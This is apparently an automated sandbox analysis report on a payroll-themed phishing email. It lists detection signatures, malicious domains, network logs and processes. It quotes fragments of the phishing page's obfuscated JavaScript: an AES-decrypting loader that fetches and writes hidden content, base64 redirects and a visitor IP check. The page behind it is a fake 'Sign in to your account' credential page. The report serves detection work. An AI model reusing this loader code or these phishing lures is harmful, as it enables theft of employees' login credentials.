Windows Analysis Report
ocedures.msg

Overview

General Information

Sample name: ocedures.msg
renamed because original name is a hash value
Original sample name: Please Read Murexltd Employees New Payroll Amendment Paid Medical Leave And Emergency Loan Procedures.msg
Analysis ID: 1499937
MD5: 9f3e44d62892eabb1442327ada8f0332
SHA1: e365751b6e99a7c7629b752d5d1755bc805fbca1
SHA256: 1637dd7df01a9c28f85ff195cb4744150850b6935b2bfee9e248dae0b5f1accb
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

HTML page contains hidden URLs
HTML page contains suspicious javascript code
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

Phishing
barindex
HTML page contains hidden URLs
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: https://infinitipulsarjoy.ru///4157.php
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: https://infinitipulsarjoy.ru///7436.php
HTML page contains suspicious javascript code
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: window.location.href = atob(
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: window.location.href = atob(
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...
HTML body contains low number of good links
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: Number of links: 0
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: Number of links: 0
HTML body contains password input but no form action
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: <input type="password" .../> found but no <form action="...
HTML body with high number of embedded images detected
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: Total embedded image size: 45708
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: Total embedded image size: 45708
HTML page contains hidden javascript code
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...
HTML title does not match URL
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: Title: Sign in to your account does not match URL
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: Title: Sign in to your account does not match URL
Javascript checks online IP of machine
Source: https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com HTTP Parser: function redirectto(url, delay) { settimeout(function() { window.location.href = url; }, delay); } function getclientip(callback) { fetch('https://api.ipify.org?format=json') .then(response => response.json()) .then(data => { callback(data.ip); }) .catch(error => { console.error('error fetching ip address:', error); callback(null); }); } function getdata(url, params) { return fetch(url + '?' + new urlsearchparams(params), { method: 'get', headers: { 'content-type': 'application/json' } }) .then(response => { if (!response.ok) { throw new error('network response was not ok'); } return response...
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: <input type="password" .../> found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No favicon
Source: https://mainet.ne.jp/ HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No favicon
Source: https://pulsecortexe.space/ HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: No favicon
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: No <meta name="author".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com HTTP Parser: No <meta name="copyright".. found
Source: https://pulsecortexe.space/ZPtar/ HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:51239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:51240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:51241 version: TLS 1.2
Source: chrome.exe Memory has grown: Private usage: 0MB later: 32MB
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.17:51168 -> 1.1.1.1:53
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 40.127.240.158
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: global traffic DNS traffic detected: DNS query: designgallerias.com
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: antibots.net
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: pulsecortexe.space
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: mainet.ne.jp
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: infinitipulsarjoy.ru
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: unknown Network traffic detected: HTTP traffic on port 51201 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51247 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51218 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51207
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51208
Source: unknown Network traffic detected: HTTP traffic on port 51249 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 51226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51209
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51203
Source: unknown Network traffic detected: HTTP traffic on port 51175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51201
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51170
Source: unknown Network traffic detected: HTTP traffic on port 51235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51172
Source: unknown Network traffic detected: HTTP traffic on port 51212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 51181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51217
Source: unknown Network traffic detected: HTTP traffic on port 51204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51221 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51210
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51211
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51176
Source: unknown Network traffic detected: HTTP traffic on port 51229 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51181
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51184
Source: unknown Network traffic detected: HTTP traffic on port 51215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51209 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51182
Source: unknown Network traffic detected: HTTP traffic on port 51232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51183
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51229
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51227
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51228
Source: unknown Network traffic detected: HTTP traffic on port 51220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51221
Source: unknown Network traffic detected: HTTP traffic on port 51243 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51220
Source: unknown Network traffic detected: HTTP traffic on port 51228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51224
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51190
Source: unknown Network traffic detected: HTTP traffic on port 51237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51195
Source: unknown Network traffic detected: HTTP traffic on port 51240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51238
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51239
Source: unknown Network traffic detected: HTTP traffic on port 51252 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51202 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51223 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51199
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51232
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51233
Source: unknown Network traffic detected: HTTP traffic on port 51195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51231
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51236
Source: unknown Network traffic detected: HTTP traffic on port 51174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51237
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51234
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51235
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51198 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51234 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51240
Source: unknown Network traffic detected: HTTP traffic on port 51217 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51249
Source: unknown Network traffic detected: HTTP traffic on port 51203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51243
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51244
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51241
Source: unknown Network traffic detected: HTTP traffic on port 51245 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51247
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51245
Source: unknown Network traffic detected: HTTP traffic on port 51171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51250
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51251
Source: unknown Network traffic detected: HTTP traffic on port 51231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51253
Source: unknown Network traffic detected: HTTP traffic on port 51179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51182 -> 443
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:51217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.17:51239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:51240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:51241 version: TLS 1.2
Source: classification engine Classification label: mal52.phis.winMSG@34/11@48/352
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240827T1207160313-6240.etl
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File read: C:\Users\desktop.ini
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\ocedures.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
